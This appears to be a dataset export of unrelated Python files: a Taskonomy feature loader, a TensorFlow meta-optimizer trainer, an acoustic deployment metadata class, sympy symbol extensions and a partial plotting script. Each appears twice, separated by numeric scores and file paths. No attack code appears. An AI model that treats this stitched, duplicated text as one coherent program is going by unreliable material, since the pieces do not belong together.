return VisualPrior.max_coverage_transform(img, k, device)
def feature_readout(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task,
then returns the result of a readout of the feature.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_predicted_label(img, feature_tasks=[feature_task], device=device)
def multi_feature_readout(img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a features driven by some vision tasks
then returns the readouts of the features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_predicted_label(img, feature_tasks, device)
def get_networks(feature_tasks, train=False, decoder=False, device=torch.device('cpu')):
'''
Return taskonomy encoder (and decoder) (with or) without gradients.
Expects inputs:
feature_tasks list
train bool
decoder bool
device torch.device
Outputs:
list(nn.Module)
'''
return VisualPrior.get_nets(feature_tasks, train, decoder, device)
def get_viable_feature_tasks():
'''
Return viable feature tasks as list of strings.
Outputs:
list(str)
'''
return VisualPrior.viable_feature_tasks
def get_max_coverate_featuresets():
'''
Return max coverate featuresets as list of list of strings.
Outputs:
list(list(str))
'''
return VisualPrior.max_coverate_featuresets
class VisualPrior(object):
max_coverate_featuresets = [
['autoencoding'],
['segment_unsup2d', 'segment_unsup25d'],
['edge_texture', 'reshading', 'curvature'],
['normal', 'keypoints2d', 'segment_unsup2d', 'segment_semantic'],
]
model_dir = None
viable_feature_tasks = [
'autoencoding',
'colorization',
'curvature',
'denoising',
'edge_texture',
'edge_occlusion',
'egomotion',
'fixated_pose',
'jigsaw',
'keypoints2d',
'keypoints3d',
'nonfixated_pose',
'point_matching',
'reshading',
'depth_zbuffer',
'depth_euclidean',
'normal',
'room_layout',
'segment_unsup25d',
'segment_unsup2d',
'segment_semantic',
'class_object',
'class_scene',
'inpainting',
'vanishing_point']
@classmethod
def to_representation(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task(s)
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
This funciton is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def to_predicted_label(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a predicted label for some task.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
This funciton is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def max_coverage_transform(cls, img, k=4, device=default_device):
assert k > 0, 'Number of features to use for the max_coverage_transform must be > 0'
if k > 4:
raise NotImplementedError("max_coverage_transform featureset not implemented for k > 4")
return cls.to_representation(img, feature_tasks=cls.max_coverate_featuresets[k - 1], device=device)
@classmethod
def set_model_dir(cls, model_dir):
cls.model_dir = model_dir
@classmethod
def get_nets(cls, feature_tasks, train, decoder, device):
if decoder:
if len(feature_tasks) == 1:
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
else:
raise NotImplementedError("Decoder retrieval only implemented for single feature task.")
else:
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
if train:
for net in nets:
# method override in taskonomy_network.py -> TaskonomyNetwork
net.train(False)
for p in net.parameters():
p.requires_grad = True
return nets
class VisualPriorRepresentation(object):
'''
Handles loading networks that transform images into encoded features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
net_paths_to_load.append(TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'])
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None):
return [cls._load_encoder(url, model_dir) for url in network_paths]
@classmethod
def _load_encoder(cls, url, model_dir=None, progress=True):
net = TaskonomyEncoder() #.cuda()
net.eval()
checkpoint = torch.utils.model_zoo.load_url(url, model_dir=model_dir, progress=progress)
net.load_state_dict(checkpoint['state_dict'])
for p in net.parameters():
p.requires_grad = False
# net = Compose(nn.GroupNorm(32, 32, affine=False), net)
return net
class VisualPriorPredictedLabel(object):
'''
Handles loading networks that transform images into transformed images.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
This class is technically unsupported and there are absolutely no guarantees.
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
if feature_task not in TASKS_TO_CHANNELS:
raise NotImplementedError('Task {} not implemented in VisualPriorPredictedLabel'.format(feature_task))
net_paths_to_load.append((TASKS_TO_CHANNELS[feature_task],
TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'],
TASKONOMY_PRETRAINED_URLS[feature_task + '_decoder']))
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None, progress=True):
nets = []
for out_channels, encoder_path, decoder_path in network_paths:
nets.append(TaskonomyNetwork(
out_channels=out_channels,
load_encoder_path=encoder_path,
load_decoder_path=decoder_path,
model_dir=model_dir,
progress=progress))
return nets
| 0.810891 | 0.500732 |
"""Learning 2 Learn training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import xrange
import tensorflow as tf
from tqdm import tqdm
from tensorflow.contrib.learn.python.learn import monitored_session as ms
import meta
import util
flags = tf.flags
logging = tf.logging
logging.set_verbosity(logging.ERROR)
FLAGS = flags.FLAGS
flags.DEFINE_string("save_path", None, "Path for saved meta-optimizer.")
flags.DEFINE_integer("num_epochs", 1000, "Number of training epochs.")
flags.DEFINE_integer("log_period", 100, "Log period.")
flags.DEFINE_integer("evaluation_period", 1000, "Evaluation period.")
flags.DEFINE_integer("evaluation_epochs", 20, "Number of evaluation epochs.")
flags.DEFINE_string("problem", "simple", "Type of problem.")
flags.DEFINE_integer("num_steps", 100,
"Number of optimization steps per epoch.")
flags.DEFINE_integer("unroll_length", 20, "Meta-optimizer unroll length.")
flags.DEFINE_float("learning_rate", 0.001, "Learning rate.")
flags.DEFINE_boolean("second_derivatives", False, "Use second derivatives.")
def main(_):
# Configuration.
num_unrolls = FLAGS.num_steps // FLAGS.unroll_length
if FLAGS.save_path is not None:
if os.path.exists(FLAGS.save_path):
raise ValueError("Folder {} already exists".format(FLAGS.save_path))
else:
os.mkdir(FLAGS.save_path)
# Problem.
problem, net_config, net_assignments = util.get_config(FLAGS.problem)
# Optimizer setup.
optimizer = meta.MetaOptimizer(**net_config)
minimize = optimizer.meta_minimize(
problem, FLAGS.unroll_length,
learning_rate=FLAGS.learning_rate,
net_assignments=net_assignments,
second_derivatives=FLAGS.second_derivatives)
step, update, reset, cost_op, _ = minimize
with ms.MonitoredSession() as sess:
# Prevent accidental changes to the graph.
tf.get_default_graph().finalize()
best_evaluation = float("inf")
total_time = 0
total_cost = 0
for e in tqdm(xrange(FLAGS.num_epochs), desc="epochs"):
# Training.
time, cost = util.run_epoch(sess, cost_op, [update, step], reset,
num_unrolls)
total_time += time
total_cost += cost
# Logging.
if (e + 1) % FLAGS.log_period == 0:
util.print_stats("Epoch {}".format(e + 1), total_cost, total_time,
FLAGS.log_period)
total_time = 0
total_cost = 0
# Evaluation.
if (e + 1) % FLAGS.evaluation_period == 0:
eval_cost = 0
eval_time = 0
for _ in xrange(FLAGS.evaluation_epochs):
time, cost = util.run_epoch(sess, cost_op, [update], reset,
num_unrolls)
eval_time += time
eval_cost += cost
util.print_stats("EVALUATION", eval_cost, eval_time,
FLAGS.evaluation_epochs)
if FLAGS.save_path is not None and eval_cost < best_evaluation:
print("Removing previously saved meta-optimizer")
for f in os.listdir(FLAGS.save_path):
os.remove(os.path.join(FLAGS.save_path, f))
print("Saving meta-optimizer to {}".format(FLAGS.save_path))
optimizer.save(sess, FLAGS.save_path)
best_evaluation = eval_cost
if __name__ == "__main__":
tf.app.run()
|
train.py
|
"""Learning 2 Learn training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import xrange
import tensorflow as tf
from tqdm import tqdm
from tensorflow.contrib.learn.python.learn import monitored_session as ms
import meta
import util
flags = tf.flags
logging = tf.logging
logging.set_verbosity(logging.ERROR)
FLAGS = flags.FLAGS
flags.DEFINE_string("save_path", None, "Path for saved meta-optimizer.")
flags.DEFINE_integer("num_epochs", 1000, "Number of training epochs.")
flags.DEFINE_integer("log_period", 100, "Log period.")
flags.DEFINE_integer("evaluation_period", 1000, "Evaluation period.")
flags.DEFINE_integer("evaluation_epochs", 20, "Number of evaluation epochs.")
flags.DEFINE_string("problem", "simple", "Type of problem.")
flags.DEFINE_integer("num_steps", 100,
"Number of optimization steps per epoch.")
flags.DEFINE_integer("unroll_length", 20, "Meta-optimizer unroll length.")
flags.DEFINE_float("learning_rate", 0.001, "Learning rate.")
flags.DEFINE_boolean("second_derivatives", False, "Use second derivatives.")
def main(_):
# Configuration.
num_unrolls = FLAGS.num_steps // FLAGS.unroll_length
if FLAGS.save_path is not None:
if os.path.exists(FLAGS.save_path):
raise ValueError("Folder {} already exists".format(FLAGS.save_path))
else:
os.mkdir(FLAGS.save_path)
# Problem.
problem, net_config, net_assignments = util.get_config(FLAGS.problem)
# Optimizer setup.
optimizer = meta.MetaOptimizer(**net_config)
minimize = optimizer.meta_minimize(
problem, FLAGS.unroll_length,
learning_rate=FLAGS.learning_rate,
net_assignments=net_assignments,
second_derivatives=FLAGS.second_derivatives)
step, update, reset, cost_op, _ = minimize
with ms.MonitoredSession() as sess:
# Prevent accidental changes to the graph.
tf.get_default_graph().finalize()
best_evaluation = float("inf")
total_time = 0
total_cost = 0
for e in tqdm(xrange(FLAGS.num_epochs), desc="epochs"):
# Training.
time, cost = util.run_epoch(sess, cost_op, [update, step], reset,
num_unrolls)
total_time += time
total_cost += cost
# Logging.
if (e + 1) % FLAGS.log_period == 0:
util.print_stats("Epoch {}".format(e + 1), total_cost, total_time,
FLAGS.log_period)
total_time = 0
total_cost = 0
# Evaluation.
if (e + 1) % FLAGS.evaluation_period == 0:
eval_cost = 0
eval_time = 0
for _ in xrange(FLAGS.evaluation_epochs):
time, cost = util.run_epoch(sess, cost_op, [update], reset,
num_unrolls)
eval_time += time
eval_cost += cost
util.print_stats("EVALUATION", eval_cost, eval_time,
FLAGS.evaluation_epochs)
if FLAGS.save_path is not None and eval_cost < best_evaluation:
print("Removing previously saved meta-optimizer")
for f in os.listdir(FLAGS.save_path):
os.remove(os.path.join(FLAGS.save_path, f))
print("Saving meta-optimizer to {}".format(FLAGS.save_path))
optimizer.save(sess, FLAGS.save_path)
best_evaluation = eval_cost
if __name__ == "__main__":
tf.app.run()
| 0.817246 | 0.230514 |
import pandas as pd
import os
class DeploymentInfo():
"""
A class to handle acoustic deployment metadadata .
Object carrying deployment metadata that can be used for example to populate
metadata fields in Annotation or Measurement objects.
Attributes
----------
data : pandas DataFrame
DataFranme with deploymnent information.
Methods
-------
write_template(filepath)
Create an empty template csv file with the proper headers.
read(filepath)
Populates the DeploymentInfo object with the information from a csv
file. The csv file must follow the samestructure as the one created by
the method write_template.
"""
def __init__(self):
"""
Initialize object with empty .data attribute.
Returns
-------
None.
"""
self.data =[]
def write_template(self, filepath):
"""
Create a blank deployment file.
Create an empty template csv file with the proper headers. The created
csv file has only the headers and an operator must fill in all the
deployment information manually. Once filled in, this file can be used
by the DeploymentInfo.read method
Parameters
----------
filepath : str
path and name of the deployment csv file to create.
Returns
-------
None. Write a blank csv deployment file that an operator can fill in.
"""
if os.path.isfile(filepath):
raise ValueError('File already exists.')
metadata = pd.DataFrame({
'audio_channel_number': [],
'UTC_offset': [],
'sampling_frequency': [],
'bit_depth': [],
'mooring_platform_name': [],
'recorder_type': [],
'recorder_SN': [],
'hydrophone_model': [],
'hydrophone_SN': [],
'hydrophone_depth': [],
'location_name': [],
'location_lat': [],
'location_lon': [],
'location_water_depth': [],
'deployment_ID': [],
'deployment_date':[],
'recovery_date':[],
})
metadata.to_csv(filepath,
sep=',',
encoding='utf-8',
header=True,
index=False,
)
def read(self, filepath):
"""
Read metadata information from csv file.
Load data from a csv file containing the deployment metadat information
and populated the data attribute of the DeploymentInfo object. The csv
file must follow the same headers and data format as the csv file
template generated by DeploymentInfo.write_template.
Parameters
----------
filepath : str
Path of the csv file to read.
Returns
-------
None. Populates the pandas dataframe in teh .data attribute of the
DeploymentInfo object.
"""
df = pd.read_csv(filepath,
delimiter=',',
#header=None,
skiprows=0,
na_values=None,
)
self.data = df
return df
|
ecosound/core/metadata.py
|
import pandas as pd
import os
class DeploymentInfo():
"""
A class to handle acoustic deployment metadadata .
Object carrying deployment metadata that can be used for example to populate
metadata fields in Annotation or Measurement objects.
Attributes
----------
data : pandas DataFrame
DataFranme with deploymnent information.
Methods
-------
write_template(filepath)
Create an empty template csv file with the proper headers.
read(filepath)
Populates the DeploymentInfo object with the information from a csv
file. The csv file must follow the samestructure as the one created by
the method write_template.
"""
def __init__(self):
"""
Initialize object with empty .data attribute.
Returns
-------
None.
"""
self.data =[]
def write_template(self, filepath):
"""
Create a blank deployment file.
Create an empty template csv file with the proper headers. The created
csv file has only the headers and an operator must fill in all the
deployment information manually. Once filled in, this file can be used
by the DeploymentInfo.read method
Parameters
----------
filepath : str
path and name of the deployment csv file to create.
Returns
-------
None. Write a blank csv deployment file that an operator can fill in.
"""
if os.path.isfile(filepath):
raise ValueError('File already exists.')
metadata = pd.DataFrame({
'audio_channel_number': [],
'UTC_offset': [],
'sampling_frequency': [],
'bit_depth': [],
'mooring_platform_name': [],
'recorder_type': [],
'recorder_SN': [],
'hydrophone_model': [],
'hydrophone_SN': [],
'hydrophone_depth': [],
'location_name': [],
'location_lat': [],
'location_lon': [],
'location_water_depth': [],
'deployment_ID': [],
'deployment_date':[],
'recovery_date':[],
})
metadata.to_csv(filepath,
sep=',',
encoding='utf-8',
header=True,
index=False,
)
def read(self, filepath):
"""
Read metadata information from csv file.
Load data from a csv file containing the deployment metadat information
and populated the data attribute of the DeploymentInfo object. The csv
file must follow the same headers and data format as the csv file
template generated by DeploymentInfo.write_template.
Parameters
----------
filepath : str
Path of the csv file to read.
Returns
-------
None. Populates the pandas dataframe in teh .data attribute of the
DeploymentInfo object.
"""
df = pd.read_csv(filepath,
delimiter=',',
#header=None,
skiprows=0,
na_values=None,
)
self.data = df
return df
| 0.775095 | 0.477798 |
from sympy.core.symbol import Symbol
from sympy.tensor.indexed import Idx, IndexedBase, Indexed
from sympy.concrete import Product
from sympy.core.compatibility import is_sequence
from sympy.core.singleton import S
from sympy.core.add import Add
from sympy.core.function import Derivative
from sympy.functions.special.tensor_functions import KroneckerDelta
from sympy.simplify.simplify import simplify
from sympy.concrete import Sum, Product
from sympy.core.containers import Tuple
base_str_total = r'\frac{{\text{{d}} {} }}{{\text{{d}} {} }}'
base_str_partial = r'\frac{{\partial {} }}{{\partial {} }}'
class ImplicitSymbol(Symbol):
def __new__(cls, name, args, **assumptions):
obj = Symbol.__new__(cls, name, **assumptions)
obj.functional_form = args
obj.base_str = base_str_total if len(obj._get_iter_func()) == 1\
else base_str_partial
return obj
def _get_iter_func(self):
funcof = self.functional_form
if not funcof:
return []
if not hasattr(self.functional_form, '__iter__'):
funcof = [self.functional_form]
return funcof
def _eval_subs(self, old, new):
if old == self:
return new
funcof = self._get_iter_func()
for a in funcof:
if a.has(old):
new_func = [x if x != a else a.subs(old, new)
for x in funcof]
return self.__class__(str(self), new_func)
return self
@property
def free_symbols(self):
return set([self]).union(*[
x.free_symbols for x in self._get_iter_func()])
def _eval_diff(self, wrt, **kw_args):
return self._eval_derivative(wrt)
def _get_df(self, a, wrt):
return ImplicitSymbol(self.base_str.format(
str(self.name), str(a)), args=self.functional_form)
def _eval_derivative(self, wrt):
if self == wrt:
return S.One
else:
funcof = self._get_iter_func()
i = 0
l = []
for a in funcof:
i += 1
da = a.diff(wrt)
if da is S.Zero:
continue
df = self._get_df(a, wrt)
l.append(df * da)
return Add(*l)
class MyIndexed(Indexed):
@property
def free_symbols(self):
return set([self])
class MyIndexedBase(IndexedBase):
@property
def free_symbols(self):
return set([self])
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return MyIndexed(self,
*indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return MyIndexed(self,
indices, **kw_args)
class IndexedFunc(MyIndexedBase):
def __new__(cls, label, args, shape=None, **kw_args):
obj = IndexedBase.__new__(cls, label, shape=shape, **kw_args)
obj.functional_form = args
return obj
def _eval_simplify(self, ratio=1.7, measure=None):
return self.__class__(self.label,
*[simplify(x, ratio=ratio, measure=measure)
for x in self._get_iter_func()])
def _get_subclass(self, *args):
return IndexedFunc.IndexedFuncValue(*args)
class IndexedFuncValue(MyIndexed):
def __new__(cls, base, *args):
functional_form = args[0]
obj = Indexed.__new__(cls, base, *args)
obj.functional_form = functional_form
obj.base_str = base_str_total if len(
obj._get_iter_func()) == 1 else base_str_partial
return obj
@property
def indices(self):
return self.args[2:]
def _eval_simplify(self, ratio=1.7, measure=None):
return self.__class__(
self.base,
*[simplify(x, ratio=ratio, measure=measure)
for x in self._get_iter_func()])
def _eval_subs(self, old, new):
if self == old:
return new
if any(x.has(old) for x in self._get_iter_func()):
return self.__class__(self.base,
tuple(x.subs(old, new)
for x in self._get_iter_func()),
*self.indices)
elif any(x.has(old) for x in self.indices):
return self.__class__(self.base,
self.functional_form,
*tuple(x.subs(old, new) for x in self.indices))
return self
def _get_iter_func(self):
funcof = self.functional_form
if not hasattr(self.functional_form, '__iter__'):
funcof = [self.functional_form]
return funcof
def _get_df(self, a, wrt):
return self.base.__class__(self.base_str.format(
str(self.base), str(a)), args=self.functional_form)[self.indices]
def _eval_diff(self, wrt, **kw_args):
return self._eval_derivative(wrt)
def _eval_derivative(self, wrt):
if self == wrt:
return S.One
elif isinstance(wrt, IndexedFunc.IndexedFuncValue) and wrt.base == self.base:
if len(self.indices) != len(wrt.indices):
msg = "Different # of indices: d({!s})/d({!s})".format(self,
wrt)
raise IndexException(msg)
elif self.functional_form != wrt.functional_form:
msg = "Different function form d({!s})/d({!s})".format(self.functional_form,
wrt.functional_form)
raise IndexException(msg)
result = S.One
for index1, index2 in zip(self.indices, wrt.indices):
result *= KroneckerDelta(index1, index2)
return result
else:
# f(x).diff(s) -> x.diff(s) * f.fdiff(1)(s)
i = 0
l = []
funcof = self._get_iter_func()
for a in funcof:
i += 1
da = a.diff(wrt)
if da is S.Zero:
continue
df = self._get_df(a, wrt)
l.append(df * da)
return Add(*l)
@property
def free_symbols(self):
return super(IndexedFunc.IndexedFuncValue, self).free_symbols.union(*[
set([x]) if not isinstance(x, IndexedFunc.IndexedFuncValue) else
x.free_symbols for x in self._get_iter_func()]).union(
[self])
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return self._get_subclass(self,
self.functional_form,
*indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return self._get_subclass(self,
self.functional_form,
indices, **kw_args)
|
derivations/scripts/sympy_addons.py
|
from sympy.core.symbol import Symbol
from sympy.tensor.indexed import Idx, IndexedBase, Indexed
from sympy.concrete import Product
from sympy.core.compatibility import is_sequence
from sympy.core.singleton import S
from sympy.core.add import Add
from sympy.core.function import Derivative
from sympy.functions.special.tensor_functions import KroneckerDelta
from sympy.simplify.simplify import simplify
from sympy.concrete import Sum, Product
from sympy.core.containers import Tuple
base_str_total = r'\frac{{\text{{d}} {} }}{{\text{{d}} {} }}'
base_str_partial = r'\frac{{\partial {} }}{{\partial {} }}'
class ImplicitSymbol(Symbol):
def __new__(cls, name, args, **assumptions):
obj = Symbol.__new__(cls, name, **assumptions)
obj.functional_form = args
obj.base_str = base_str_total if len(obj._get_iter_func()) == 1\
else base_str_partial
return obj
def _get_iter_func(self):
funcof = self.functional_form
if not funcof:
return []
if not hasattr(self.functional_form, '__iter__'):
funcof = [self.functional_form]
return funcof
def _eval_subs(self, old, new):
if old == self:
return new
funcof = self._get_iter_func()
for a in funcof:
if a.has(old):
new_func = [x if x != a else a.subs(old, new)
for x in funcof]
return self.__class__(str(self), new_func)
return self
@property
def free_symbols(self):
return set([self]).union(*[
x.free_symbols for x in self._get_iter_func()])
def _eval_diff(self, wrt, **kw_args):
return self._eval_derivative(wrt)
def _get_df(self, a, wrt):
return ImplicitSymbol(self.base_str.format(
str(self.name), str(a)), args=self.functional_form)
def _eval_derivative(self, wrt):
if self == wrt:
return S.One
else:
funcof = self._get_iter_func()
i = 0
l = []
for a in funcof:
i += 1
da = a.diff(wrt)
if da is S.Zero:
continue
df = self._get_df(a, wrt)
l.append(df * da)
return Add(*l)
class MyIndexed(Indexed):
@property
def free_symbols(self):
return set([self])
class MyIndexedBase(IndexedBase):
@property
def free_symbols(self):
return set([self])
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return MyIndexed(self,
*indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return MyIndexed(self,
indices, **kw_args)
class IndexedFunc(MyIndexedBase):
def __new__(cls, label, args, shape=None, **kw_args):
obj = IndexedBase.__new__(cls, label, shape=shape, **kw_args)
obj.functional_form = args
return obj
def _eval_simplify(self, ratio=1.7, measure=None):
return self.__class__(self.label,
*[simplify(x, ratio=ratio, measure=measure)
for x in self._get_iter_func()])
def _get_subclass(self, *args):
return IndexedFunc.IndexedFuncValue(*args)
class IndexedFuncValue(MyIndexed):
def __new__(cls, base, *args):
functional_form = args[0]
obj = Indexed.__new__(cls, base, *args)
obj.functional_form = functional_form
obj.base_str = base_str_total if len(
obj._get_iter_func()) == 1 else base_str_partial
return obj
@property
def indices(self):
return self.args[2:]
def _eval_simplify(self, ratio=1.7, measure=None):
return self.__class__(
self.base,
*[simplify(x, ratio=ratio, measure=measure)
for x in self._get_iter_func()])
def _eval_subs(self, old, new):
if self == old:
return new
if any(x.has(old) for x in self._get_iter_func()):
return self.__class__(self.base,
tuple(x.subs(old, new)
for x in self._get_iter_func()),
*self.indices)
elif any(x.has(old) for x in self.indices):
return self.__class__(self.base,
self.functional_form,
*tuple(x.subs(old, new) for x in self.indices))
return self
def _get_iter_func(self):
funcof = self.functional_form
if not hasattr(self.functional_form, '__iter__'):
funcof = [self.functional_form]
return funcof
def _get_df(self, a, wrt):
return self.base.__class__(self.base_str.format(
str(self.base), str(a)), args=self.functional_form)[self.indices]
def _eval_diff(self, wrt, **kw_args):
return self._eval_derivative(wrt)
def _eval_derivative(self, wrt):
if self == wrt:
return S.One
elif isinstance(wrt, IndexedFunc.IndexedFuncValue) and wrt.base == self.base:
if len(self.indices) != len(wrt.indices):
msg = "Different # of indices: d({!s})/d({!s})".format(self,
wrt)
raise IndexException(msg)
elif self.functional_form != wrt.functional_form:
msg = "Different function form d({!s})/d({!s})".format(self.functional_form,
wrt.functional_form)
raise IndexException(msg)
result = S.One
for index1, index2 in zip(self.indices, wrt.indices):
result *= KroneckerDelta(index1, index2)
return result
else:
# f(x).diff(s) -> x.diff(s) * f.fdiff(1)(s)
i = 0
l = []
funcof = self._get_iter_func()
for a in funcof:
i += 1
da = a.diff(wrt)
if da is S.Zero:
continue
df = self._get_df(a, wrt)
l.append(df * da)
return Add(*l)
@property
def free_symbols(self):
return super(IndexedFunc.IndexedFuncValue, self).free_symbols.union(*[
set([x]) if not isinstance(x, IndexedFunc.IndexedFuncValue) else
x.free_symbols for x in self._get_iter_func()]).union(
[self])
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return self._get_subclass(self,
self.functional_form,
*indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return self._get_subclass(self,
self.functional_form,
indices, **kw_args)
| 0.752468 | 0.216881 |
import pandas as pd
import h5py
import numpy as np
import os
import matplotlib.pyplot as plt
#load cdsdb
new_file = h5py.File("../data/csdb_bt/csdb_bt.h5", "r")
bt_csdb = new_file["bt"][:]
new_file.close()
#compute mean and var csdb dataset
df_bt_csdb = pd.DataFrame(bt_csdb)
mean_bt_csdb = df_bt_csdb.mean()
var_bt_csdb = df_bt_csdb.var()
directory = "../data/mipas_blabeled_2009/2009_bt"
files = [i for i in os.listdir(directory)]
bt_mipas_tot = np.empty([0, 142])
for file in files:
#load mipas df
bt_mipas = np.empty([0, 142])
new_file = h5py.File(os.path.join(directory, file), "r")
bt_mipas = new_file["bt"][:]
new_file.close()
bt_mipas_tot = np.vstack([bt_mipas_tot, bt_mipas])
df_bt_mipas = pd.DataFrame(bt_mipas_tot)
mean_bt_mipas = df_bt_mipas.mean()
var_bt_mipas = df_bt_mipas.var()
#plotting variance
my_path = "../progetti/bt_mean_var/"
if not os.path.exists(my_path):
os.makedirs(my_path)
my_file = "var_bt" + ".png"
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax1.plot(np.arange(0,142), var_bt_mipas, label = "mipas")
ax1.plot(np.arange(0,142), var_bt_csdb, label = "csdb")
loc = [84, 99, 107, 113, 125, 131, 137]
new_tick_locations = np.array(loc)
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
transition = ["t1", "t2", "t3", "t4", "t5", "t6", "t7"]
ax2.set_xticklabels(transition)
ax2.set_xlabel("transition")
title = ax2.set_title("Variance: BT")
title.set_y(1.1)
fig.subplots_adjust(top=0.85)
ax1.legend()
for tr in loc:
ax1.axvline(tr, linewidth = 1, color = 'k')
ax1.set_ylabel("var")
ax1.set_xlabel("BT")
fig.savefig(os.path.join(my_path, my_file))
plt.close()
#plotting mean
my_file = "mean_bt" + ".png"
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax1.plot(np.arange(0,142), mean_bt_mipas, label = "mipas")
ax1.plot(np.arange(0,142), mean_bt_csdb, label = "csdb")
new_tick_locations = np.array(loc)
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
ax2.set_xticklabels(transition)
ax2.set_xlabel("transition")
title = ax2.set_title("Mean: BT")
title.set_y(1.1)
fig.subplots_adjust(top=0.85)
ax1.legend()
for tr in loc:
ax1.axvline(tr, linewidth = 1, color = 'k')
ax1.set_ylabel("mean")
ax1.set_xlabel("BT")
fig.savefig(os.path.join(my_path, my_file))
plt.close()
"""
#btd
new_file = h5py.File("../data/csdb_new/csdb_complete.h5", "r")
btd_csdb = new_file["btd_complete"][:]
new_file.close()
df_btd_csdb = pd.DataFrame(btd_csdb)
mean_btd_csdb = df_btd_csdb.mean()
var_btd_csdb = df_btd_csdb.var()
directory = "../data/mipas_pd"
files = [i for i in os.listdir(directory)]
files = files[19:24]
df_btd_mipas_complete = pd.DataFrame()
for file in files:
#load mipas df
df_btd_mipas = pd.read_hdf(os.path.join(directory, file),'df_btd')
df_btd_mipas_complete = df_btd_mipas_complete.append(df_btd_mipas)
mean_btd_mipas = df_btd_mipas.iloc[:, 0:10011].mean()
var_btd_mipas = df_btd_mipas.iloc[:, 0:10011].var()
plt.plot(np.arange(0,10011), var_btd_mipas, label = "mipas")
plt.plot(np.arange(0,10011), var_btd_csdb, label = "csdb")
"""
|
code/mean_var_bt.py
|
import pandas as pd
import h5py
import numpy as np
import os
import matplotlib.pyplot as plt
#load cdsdb
new_file = h5py.File("../data/csdb_bt/csdb_bt.h5", "r")
bt_csdb = new_file["bt"][:]
new_file.close()
#compute mean and var csdb dataset
df_bt_csdb = pd.DataFrame(bt_csdb)
mean_bt_csdb = df_bt_csdb.mean()
var_bt_csdb = df_bt_csdb.var()
directory = "../data/mipas_blabeled_2009/2009_bt"
files = [i for i in os.listdir(directory)]
